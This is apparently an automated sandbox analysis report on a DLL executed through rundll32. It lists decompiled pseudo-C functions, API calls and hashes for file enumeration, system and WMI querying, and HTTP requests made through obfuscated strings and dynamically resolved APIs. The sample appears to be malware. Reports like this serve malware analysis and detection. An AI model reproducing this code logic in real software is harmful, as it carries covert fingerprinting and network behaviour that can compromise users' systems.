0x10009f7b
0x00000000
0x10009f3e
0x10009ecf
0x10009ed1
0x10009ed1
0x10009edd
0x10009ede
0x10009ee8
0x00000000
0x00000000
0x10009ef5
0x10009efa
0x10009eff
0x00000000
0x00000000
0x10009f01
0x10009f08
0x10009f0e
0x10009f0e
0x10009f11
0x10009f1e
0x00000000
0x00000000
0x00000000
0x10009f7c
0x10009f8a
0x10009f92
0x10009f98
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 10009EA1
FindNextFileW.KERNEL32(00000000,?), ref: 10009F84

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: ae9c37ce122c04667dac7d1167ad8c9b28cb489da10c75ada123c9762d696c28
Instruction ID: 555cadeb5f071304b440e3dadb6de0eb34a7c2fec7698278087d2bad13c9927d
Opcode Fuzzy Hash: ae9c37ce122c04667dac7d1167ad8c9b28cb489da10c75ada123c9762d696c28
Instruction Fuzzy Hash: 51310831A042166FFB10DBA4CD89FAA77A9EB04790F100074F919D71D6EB71ED40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000B967 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000B967(void* __ecx) {
				struct _SYSTEM_INFO _v40;
				void* _t5;

				if(__ecx == 0) {
					GetSystemInfo( &_v40);
					return _v40.dwOemId & 0x0000ffff;
				} else {
					_t5 = 9;
					return _t5;
				}
			}

0x1000b96f
0x1000b97a
0x1000b985
0x1000b971
0x1000b973
0x1000b975
0x1000b975

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,1000BE52,?,?,00000000), ref: 1000B97A

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 767d4d8b320d70d3546e6dadcfa05ce5210f431b328cf14a8369f91b60a3ea89
Instruction ID: 0ea09056568cddae72f6db05d408285a1f01a126f74f09a3d9f776612afef0c3
Opcode Fuzzy Hash: 767d4d8b320d70d3546e6dadcfa05ce5210f431b328cf14a8369f91b60a3ea89
Instruction Fuzzy Hash: ECC0C031A0020D46DF00DFB167466EE33FC4B082C8F100050EE03F00C5E960DD804370

Uniqueness

Uniqueness Score: -1.00%

Function 1000D7CB Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1000D7CB(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D2F7(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E100091E7(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E10009203( &_v60, 0xfffffffe);
					E1000D3AB( &_v104);
					return _t320;
				}
				_t165 = E100091B2(_t255, 0x101c);
				 *_t328 = 0xa18;
				_v52 = _t165;
				_t166 = E100091B2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100099EC(_t165);
				_v60 = _t322;
				E10009E2E( &_v52);
				E10009E2E( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100091B2(_t255, 0x10b4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E10009E2E( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E10009203( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E1000984F(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E1000984F(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E10009281(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E100091E7( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E10009203(_t136, 0);
								E10009203( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E1000984F(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100091B2(_t281, 0xe23);
								 *_t329 = 0x375;
								_t217 = E100091B2(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100091E7(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E10009E2E( &_v92);
											E10009E2E( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E1000C172();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100091E7(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100091B2(_t283, 0xedb);
										E1000C172( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E10009E2E( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E1000984F(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000D6AF( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E10009203( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x1000d7d4
0x1000d7da
0x1000d7e1
0x1000d7e4
0x1000d7e7
0x1000d7ec
0x1000d7ee
0x1000d7f3
0x1000dc3b
0x1000dc3b
0x1000d800
0x1000d802
0x1000d805
0x1000d808
0x1000dc20
0x1000dc26
0x1000dc30
0x00000000
0x1000dc35
0x1000d813
0x1000d81a
0x1000d821
0x1000d824
0x1000d829
0x1000d82b
0x1000d82e
0x1000d831
0x1000d832
0x1000d83b
0x1000d841
0x1000d844
0x1000d84d
0x1000d852
0x1000d857
0x1000d86e
0x1000d87b
0x1000d87e
0x1000d885
0x1000d88a
0x1000d891
0x1000d896
0x1000d89d
0x1000d89f
0x1000d8ab
0x1000d8ae
0x1000d8b0
0x1000dc10
0x1000dc11
0x1000dc1a
0x00000000
0x1000dc1a
0x1000d8b6
0x1000d8b9
0x1000d8bc
0x1000d8bf
0x1000d8c1
0x1000dbdc
0x1000dbdf
0x1000dbe2
0x1000dbe4
0x1000dc06
0x1000dc0b
0x1000dbe6
0x1000dbe9
0x1000dbf4
0x1000dbfb
0x1000dbfb
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d8c7
0x1000d8c7
0x1000d8d9
0x1000d8dc
0x1000d8de
0x00000000
0x00000000
0x1000d8e6
0x1000d8e9
0x1000d8ec
0x1000d8ef
0x1000d8f2
0x1000d8f5
0x00000000
0x00000000
0x1000d8fb
0x1000d909
0x1000d90c
0x1000d90e
0x1000d927
0x1000d936
0x1000d93e
0x1000d93e
0x1000d941
0x1000d948
0x1000d94c
0x1000d952
0x1000d954
0x1000dbc4
0x1000dbca
0x1000dbd0
0x1000dbd3
0x1000dbd3
0x00000000
0x1000dbd3
0x1000d963
0x1000d977
0x1000d97b
0x1000d97d
0x1000d982
0x1000db91
0x1000db97
0x1000dba2
0x1000dbad
0x1000dbb3
0x1000dbb9
0x1000dbbc
0x00000000
0x1000dbbc
0x1000d988
0x1000db5f
0x1000db5f
0x1000db62
0x1000db65
0x00000000
0x00000000
0x1000d990
0x1000d998
0x1000d99f
0x1000d9a5
0x1000d9a7
0x00000000
0x00000000
0x1000d9b0
0x1000d9c5
0x1000d9cb
0x1000d9d4
0x1000d9d7
0x1000d9da
0x1000d9dc
0x1000db52
0x1000db55
0x1000db5e
0x1000db5e
0x00000000
0x1000db5e
0x1000d9ec
0x1000d9ef
0x1000d9f6
0x1000d9fc
0x1000d9ff
0x1000da02
0x1000da05
0x1000da08
0x1000da44
0x1000da44
0x1000da47
0x1000daf3
0x1000db07
0x1000db17
0x1000db1b
0x1000db1d
0x1000db34
0x1000db38
0x1000db41
0x1000db4c
0x00000000
0x1000db4c
0x1000db23
0x1000db24
0x1000db29
0x1000db29
0x1000db2b
0x1000db2c
0x1000db31
0x00000000
0x1000db31
0x1000da4d
0x1000da4d
0x1000da50
0x1000dabb
0x1000dacf
0x1000dadf
0x1000dae3
0x1000dae5
0x00000000
0x00000000
0x1000daeb
0x1000daec
0x00000000
0x1000daec
0x1000da52
0x1000da52
0x1000da55
0x00000000
0x00000000
0x1000da57
0x1000da5a
0x00000000
0x00000000
0x1000da5c
0x1000da5c
0x1000da62
0x1000da7e
0x1000da8d
0x1000da96
0x1000da9b
0x1000da9e
0x1000daa4
0x1000daa4
0x1000daa9
0x1000dab5
0x00000000
0x1000dab5
0x1000da67
0x00000000
0x1000da67
0x1000da0a
0x1000da31
0x1000da36
0x1000da3b
0x1000da3d
0x1000da3d
0x00000000
0x1000da3b
0x1000da0c
0x1000da0c
0x1000da0f
0x00000000
0x00000000
0x1000da15
0x1000da15
0x1000da18
0x00000000
0x00000000
0x1000da1e
0x1000da1e
0x1000da21
0x00000000
0x00000000
0x1000da27
0x1000da2a
0x00000000
0x00000000
0x1000da2c
0x00000000
0x1000da2c
0x1000db6e
0x1000db74
0x1000db7a
0x1000db7d
0x1000db80
0x1000db80
0x1000db83
0x1000db84
0x1000db87
0x1000db89
0x00000000
0x00000000
0x1000dbd9
0x1000dbd9
0x00000000
0x1000dbd9
0x1000d910
0x1000d916
0x00000000
0x1000d916
0x1000dbd6
0x00000000
0x1000d859
0x1000d85e
0x1000d863
0x00000000
0x1000d867

APIs

Part of subcall function 1000D2F7: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D30A
Part of subcall function 1000D2F7: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D31B
Part of subcall function 1000D2F7: CoCreateInstance.OLE32(1001D848,00000000,00000001,1001D858,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D332
Part of subcall function 1000D2F7: SysAllocString.OLEAUT32(00000000), ref: 1000D33D
Part of subcall function 1000D2F7: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D368

SysAllocString.OLEAUT32(00000000), ref: 1000D874
SysAllocString.OLEAUT32(00000000), ref: 1000D888
SysFreeString.OLEAUT32(?), ref: 1000DC11
SysFreeString.OLEAUT32(?), ref: 1000DC1A

Part of subcall function 10009203: HeapFree.KERNEL32(00000000,00000000), ref: 10009249

Strings

TRUE, xrefs: 1000DA36
FALSE, xrefs: 1000DA3D

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: String$AllocFree$Initialize$BlanketCreateHeapInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 318989454-1412513891
Opcode ID: 919d23eae1f380bfe7b5be4e16ac5c52cd0d3706257f31220665b853bc84d9e5
Instruction ID: 5aa9c036717eb5a5c9b7cbab616e939d641ea401ff5d011f55a91f8be1bcc091
Opcode Fuzzy Hash: 919d23eae1f380bfe7b5be4e16ac5c52cd0d3706257f31220665b853bc84d9e5
Instruction Fuzzy Hash: 63E17275E00219EFEB04EFE4C885EEEBBB9FF49340F10455AE505A7289DB71A941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10013259 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E10013259(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E100131B4( &_v16);
				return 0;
			}

0x1001325f
0x10013271
0x10013275
0x100132e9
0x00000000
0x100132eb
0x10013285
0x10013289
0x00000000
0x00000000
0x10013291
0x10013293
0x10013298
0x00000000
0x00000000
0x100132a2
0x100132a6
0x00000000
0x00000000
0x100132a8
0x100132ad
0x100132af
0x100132b1
0x100132b6
0x100132bb
0x00000000
0x00000000
0x100132c6
0x100132d0
0x100132d4
0x00000000
0x00000000
0x100132e3
0x00000000

APIs

GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,?,10008254,00000000), ref: 1001326B
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 10013283
GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 10013291
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 100132A0

Strings

CryptAcquireContextA, xrefs: 1001327D
advapi32.dll, xrefs: 10013266
CryptReleaseContext, xrefs: 1001329A
CryptGenRandom, xrefs: 1001328B

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: ecc3d0c9c8d29e75a8d695109f5af85a5ebb6e8c0cf637ab81bd802e9145332d
Instruction ID: 44cfbbe63dd5ec5fb2c5023fe683171a121c93bc589d1a284ce58b4995778660
Opcode Fuzzy Hash: ecc3d0c9c8d29e75a8d695109f5af85a5ebb6e8c0cf637ab81bd802e9145332d
Instruction Fuzzy Hash: 7D118236A00619B7DB11E6E98C45F9EB7ECDF45650F114072FA00EA140DB76DA848698

Uniqueness

Uniqueness Score: -1.00%

Function 1000F11F Relevance: 13.8, APIs: 7, Strings: 2, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E1000F11F(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				char _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t91;
				intOrPtr _t99;
				intOrPtr* _t101;
				intOrPtr _t106;
				signed int _t107;
				void* _t108;
				intOrPtr _t109;
				signed int _t110;
				intOrPtr _t112;
				char _t114;
				intOrPtr _t119;
				intOrPtr _t126;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				char _t142;
				intOrPtr _t144;
				void* _t154;
				signed int _t156;
				intOrPtr _t162;
				intOrPtr _t167;
				signed int _t168;
				signed int _t176;
				char _t182;
				signed int _t183;
				void* _t184;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				char _t189;
				void* _t190;
				void* _t191;
				intOrPtr* _t193;

				_t157 = __ecx;
				_v40 = _v40 & 0x00000000;
				_t184 = __edx;
				_v24 = __ecx;
				_v32 = 4;
				_v36 = 1;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_t193 = _t191 + 0x18;
				_v64 = E10009192(_t157, 0x503);
				 *_t193 = 0x14ee;
				_v60 = E10009192(_t157);
				 *_t193 = 0x18a;
				_v56 = E10009192(_t157);
				 *_t193 = 0x128f;
				_v52 = E10009192(_t157);
				 *_t193 = 0xe8b;
				_t91 = E10009192(_t157);
				_v44 = _v44 & 0;
				_t182 = 0x3c;
				_v48 = _t91;
				E1000936A( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t182;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000CF09(_t184));
				_t99 =  *0x10020fb8; // 0x0
				_push(_t184);
				if( *((intOrPtr*)(_t99 + 0x28))() != 0) {
					_t176 = 0;
					__eflags = 0;
					_v28 = 0;
					do {
						_t101 =  *0x10020fb8; // 0x0
						_v12 = 0x8404f700;
						_t183 =  *_t101( *0x100210cc,  *((intOrPtr*)(_t190 + _t176 * 4 - 0x24)), 0, 0, 0);
						__eflags = _t183;
						if(_t183 != 0) {
							E1000F0B7(_t183);
							_t106 =  *0x10020fb8; // 0x0
							_t107 =  *((intOrPtr*)(_t106 + 0x1c))(_t183,  &_v396, _v100, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t156 = _t107;
							if(_a24 != 0) {
								E1000C3B5(_a24);
							}
							__eflags = _t156;
							if(_t156 != 0) {
								__eflags = _v112 - 4;
								_t162 = 0x8484f700;
								if(_v112 != 4) {
									_t162 = _v12;
								}
								__eflags = _v24 - 2;
								_t108 = 0x1001df14;
								if(_v24 != 2) {
									_t108 = 0x1001df1c;
								}
								_t164 =  &_v652;
								_t109 =  *0x10020fb8; // 0x0
								_t110 =  *((intOrPtr*)(_t109 + 0x20))(_t156, _t108,  &_v652, 0, 0,  &_v64, _t162, 0);
								__eflags = _a24;
								_t186 = _t110;
								_v8 = _t186;
								if(_a24 != 0) {
									_t164 = _a24;
									E1000C3B5(_a24);
								}
								__eflags = _t186;
								if(_t186 != 0) {
									__eflags = _v112 - 4;
									if(_v112 == 4) {
										_t164 = _t186;
										E1000F065(_t186);
									}
									__eflags = _v24 - 2;
									if(_v24 != 2) {
										__eflags = 0;
										_t112 =  *0x10020fb8; // 0x0
										_v12 =  *((intOrPtr*)(_t112 + 0x24))(_t186, 0, 0, 0, 0);
									} else {
										_t142 = E10009192(_t164, 0xfb3);
										_t189 = _t142;
										_v16 = _t189;
										_t144 =  *0x10020fb8; // 0x0
										_t186 = _v8;
										_v12 =  *((intOrPtr*)(_t144 + 0x24))(_t186, _t189, E1000CF09(_t189), _a4, _a8);
										E10009E14( &_v16);
									}
									__eflags = _a24;
									if(_a24 != 0) {
										E1000C3B5(_a24);
									}
									__eflags = _v12;
									if(_v12 != 0) {
										L31:
										_t114 = 8;
										_v32 = _t114;
										_v20 = 0;
										_v16 = 0;
										E1000936A( &_v20, 0, _t114);
										_t119 =  *0x10020fb8; // 0x0
										__eflags =  *((intOrPtr*)(_t119 + 0xc))(_t186, 0x13,  &_v20,  &_v32, 0);
										if(__eflags != 0) {
											_t187 = E1000C2C8( &_v20, __eflags);
											__eflags = _t187 - 0xc8;
											if(_t187 == 0xc8) {
												 *_a20 = _v8;
												 *_a12 = _t183;
												 *_a16 = _t156;
												__eflags = 0;
												return 0;
											}
											_t188 =  ~_t187;
											L35:
											_t126 =  *0x10020fb8; // 0x0
											 *((intOrPtr*)(_t126 + 8))(_v8);
											L36:
											__eflags = _t156;
											if(_t156 != 0) {
												_t130 =  *0x10020fb8; // 0x0
												 *((intOrPtr*)(_t130 + 8))(_t156);
											}
											__eflags = _t183;
											if(_t183 != 0) {
												_t167 =  *0x10020fb8; // 0x0
												 *((intOrPtr*)(_t167 + 8))(_t183);
											}
											return _t188;
										}
										GetLastError();
										_t188 = 0xfffffff8;
										goto L35;
									} else {
										GetLastError();
										_t134 =  *0x10020fb8; // 0x0
										 *((intOrPtr*)(_t134 + 8))(_t186);
										_t186 = 0;
										__eflags = 0;
										goto L26;
									}
								} else {
									GetLastError();
									L26:
									_t136 =  *0x10020fb8; // 0x0
									 *((intOrPtr*)(_t136 + 8))(_t156);
									_t156 = 0;
									__eflags = 0;
									goto L27;
								}
							} else {
								GetLastError();
								L27:
								_t138 =  *0x10020fb8; // 0x0
								 *((intOrPtr*)(_t138 + 8))(_t183);
								_t183 = 0;
								__eflags = 0;
								goto L28;
							}
						}
						GetLastError();
						L28:
						_t168 = _t186;
						_t176 = _v28 + 1;
						_v28 = _t176;
						__eflags = _t176 - 2;
					} while (_t176 < 2);
					_v8 = _t186;
					__eflags = _t168;
					if(_t168 != 0) {
						goto L31;
					}
					_t188 = 0xfffffffe;
					goto L36;
				}
				_t154 = 0xfffffffc;
				return _t154;
			}

0x1000f11f
0x1000f128
0x1000f135
0x1000f137
0x1000f13f
0x1000f148
0x1000f154
0x1000f165
0x1000f16a
0x1000f177
0x1000f17a
0x1000f186
0x1000f189
0x1000f195
0x1000f198
0x1000f1a4
0x1000f1a7
0x1000f1ae
0x1000f1b3
0x1000f1b9
0x1000f1bb
0x1000f1c3
0x1000f1ce
0x1000f1d5
0x1000f1e1
0x1000f1e4
0x1000f1f2
0x1000f1f5
0x1000f1fb
0x1000f1fc
0x1000f1fe
0x1000f207
0x1000f208
0x1000f20d
0x1000f213
0x1000f21d
0x1000f21d
0x1000f21f
0x1000f224
0x1000f224
0x1000f233
0x1000f242
0x1000f244
0x1000f246
0x1000f255
0x1000f26c
0x1000f272
0x1000f275
0x1000f279
0x1000f27b
0x1000f280
0x1000f280
0x1000f285
0x1000f287
0x1000f294
